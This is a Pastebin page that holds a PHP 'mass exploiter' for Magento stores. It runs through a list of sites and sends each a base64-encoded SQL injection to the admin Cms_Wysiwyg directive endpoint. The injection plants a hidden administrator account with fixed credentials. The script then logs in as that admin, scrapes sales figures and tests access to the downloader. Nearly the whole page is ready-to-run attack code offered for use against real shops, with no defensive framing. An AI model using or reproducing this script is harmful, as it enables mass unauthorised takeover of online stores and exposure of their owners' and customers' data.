daily pastebin goal
80%
SHARE
TWEET

Magento Add Admin Exploiter

Berandal666 Mar 17th, 2017 124 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. error_reporting(0);
  4. set_time_limit(0);
  5. $banner = '
  6.   #---------------------------------------------------------#
  7.   #        Magento Add Administrator Mass Exploiter         #
  8.   #                   Coded By Berandal                     #
  9.   #                       Owl Squad                         #
  10.   #            http://facebook.com/owlsquad.id              #
  11.   #                 twitter.com/id_berandal                 #
  12.   #---------------------------------------------------------#
  13. ';
  14. function bersihkan($htmltags) {
  15.     $htmltags = str_replace('<span class="price">','',$htmltags);
  16.     $htmltags = str_replace('</span>','',$htmltags);
  17.     return $htmltags;
  18.    
  19. }
  20. $postadm = "filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdoeWRyYTc3JykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7U0VMRUNUIEBFWFRSQSA6PSBNQVgoZXh0cmEpIEZST00gYWRtaW5fdXNlciBXSEVSRSBleHRyYSBJUyBOT1QgTlVMTDtJTlNFUlQgSU5UTyBgYWRtaW5fdXNlcmAgKGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgLGBycF90b2tlbmAsYHJwX3Rva2VuX2NyZWF0ZWRfYXRgKSBWQUxVRVMgKCdGaXJzdG5hbWUnLCdMYXN0bmFtZScsJ2VtYWlsQGV4YW1wbGUuY29tJywnaHlkcmEnLEBQQVNTLE5PVygpLDAsMCwxLEBFWFRSQSxOVUxMLCBOT1coKSk7SU5TRVJUIElOVE8gYGFkbWluX3JvbGVgIChwYXJlbnRfaWQsdHJlZV9sZXZlbCxzb3J0X29yZGVyLHJvbGVfdHlwZSx1c2VyX2lkLHJvbGVfbmFtZSkgVkFMVUVTICgxLDIsMCwnVScsKFNFTEVDVCB1c2VyX2lkIEZST00gYWRtaW5fdXNlciBXSEVSRSB1c2VybmFtZSA9ICdoeWRyYScpLCdGaXJzdG5hbWUnKTs%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1";
  21. $postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=berandal&login%5Bpassword%5D=berandal";
  22. $postdwn = "username=berandal&password=berandal";
  23. $pageadm = "/admin/Cms_Wysiwyg/directive/index/";
  24. $pagelog = "/admin/";
  25. $pagedwn = "/downloader/";
  26.  
  27. function stupid_CURL($url,$data,$page) {
  28. $ch = curl_init();
  29. curl_setopt ($ch, CURLOPT_URL, $url.$page);
  30. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  31. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  32. curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
  33. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  34. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  35. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  36. curl_setopt ($ch, CURLOPT_POST, 1);
  37. $headers  = array();
  38. $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  39.  
  40. curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
  41. curl_setopt ($ch, CURLOPT_HEADER, 1);
  42. $result = curl_exec ($ch);
  43. curl_close($ch);
  44. return $result;
  45. }
  46. print $banner;
  47. $get=file_get_contents($argv[1])
  48. or die("
  49. \n\tError !
  50. \n\tusage => php thisfile.php yourlist.txt\n\n");
  51. $j=explode("\r\n",$get);
  52. foreach($j as $site){
  53.    
  54. print "\n\n\t=> Checking : ".$site;
  55. $hajar = stupid_CURL($site , $postadm, $pageadm);
  56.  
  57. if(preg_match('#200 OK#', $hajar)) {
  58.     $expres = "Success";
  59.     $ceklog = stupid_CURL($site , $postlog, $pagelog);
  60.    
  61. if(preg_match('#302 Moved#', $ceklog)) {
  62.     preg_match_all('#<span class="price">(.*?)</span>#si', $ceklog, $match);
  63.     foreach($match as $val)
  64.     {
  65.     $ltm = $val[0];
  66.     $avo = $val[1];
  67.     break;
  68.     }
  69.     $admlog = "Success";
  70.     $user = "berandal";
  71.     $pass = "berandal";
  72.     $cekdwn = stupid_CURL($site , $postdwn, $pagedwn);
  73.     if(preg_match('#Return to Admin#', $cekdwn)) {
  74.     $dwnlog = "Login Success";
  75. }else {
  76.     $dwnlog = "Login Failed";
  77. }
  78. }else {
  79.     $admlog = "Failed";
  80.     $user = "NULL";
  81.     $pass = "NULL";
  82. }
  83. }else {
  84.     $admlog = "Failed";
  85.     $expres = "Failed";
  86.     $user = "NULL";
  87.     $pass = "NULL";
  88.     $dwnlog = "Login Failed";
  89.     $ltm = "NULL";
  90.     $avo = "NULL";
  91. }
  92. echo '
  93.     +-----------------------------------------------------+
  94.     +-------Magento Add Admin Exploiter by Berandal-------+
  95.     +-----------------------------------------------------+
  96.     | Exploiting    : '.$expres.'
  97.     | Login Admin   : '.$admlog.'
  98.     | Lifetime Sales: '.bersihkan($ltm).'
  99.     | Average Order : '.bersihkan($avo).'
  100.     | Downloader    : '.$dwnlog.'
  101.     | Username  : '.$user.'
  102.     | Password  : '.$pass.'
  103.     +-----------------------------------------------------+
  104. ';
  105. }
  106. ?>
RAW Paste Data
Top